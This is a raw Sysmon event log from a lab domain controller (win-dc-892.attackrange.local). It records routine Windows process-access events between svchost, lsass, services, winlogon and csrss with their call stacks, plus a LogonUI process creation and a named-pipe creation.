12:00:44.643{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001108Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001107Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646A-6064-0B00-00000000AE01}856580C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001106Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001105Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001104Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646A-6064-0B00-00000000AE01}856580C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001103Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646A-6064-0B00-00000000AE01}856580C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001102Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001101Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001100Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001099Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001098Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001097Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646A-6064-0B00-00000000AE01}856580C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001096Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.627{266CAFBE-646A-6064-0800-00000000AE01}704816C:\Windows\system32\csrss.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001095Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.627{266CAFBE-646A-6064-0900-00000000AE01}788792C:\Windows\system32\winlogon.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+193b7|C:\Windows\system32\winlogon.exe+22617|C:\Windows\system32\winlogon.exe+2b287|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001094Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.631{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\System32\LogonUI.exe10.0.14393.0 (rs1_release.160715-1616)Windows Logon User Interface HostMicrosoft® Windows® Operating SystemMicrosoft Corporationlogonui.exe"LogonUI.exe" /flags:0x2 /state0:0xa3b8b855 /state1:0x41c64e6dC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e71SystemMD5=B38DFCF985D8AE5B1A17C264981E61C7,SHA256=AA62D29803D52EC06CD27ED3124E034048F09606EB7342181913C9817C7B44C5,IMPHASH=A6F3A84D171E55B51A7343E05C8DFAC3{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\System32\winlogon.exewinlogon.exe 10341000x80000000000000001093Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.627{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001092Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.627{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001091Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.627{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001090Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.627{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001089Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.549{266CAFBE-646C-6064-0C00-00000000AE01}592692C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2387f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001088Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.549{266CAFBE-646C-6064-0C00-00000000AE01}592692C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+2380c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001087Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.549{266CAFBE-646C-6064-0C00-00000000AE01}592692C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+237c4|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001086Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.549{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0800-00000000AE01}704C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1a7a4|c:\windows\system32\lsm.dll+1aa31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001085Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.549{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6469-6064-0500-00000000AE01}624C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1a7a4|c:\windows\system32\lsm.dll+1aa31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001084Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:44.549{266CAFBE-646C-6064-0C00-00000000AE01}592\LSM_API_serviceC:\Windows\system32\svchost.exe 10341000x80000000000000001083Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.534{266CAFBE-646C-6064-0C00-00000000AE01}592836C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0800-00000000AE01}704C:\Windows\system32\csrss.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1ac1c|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001082Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 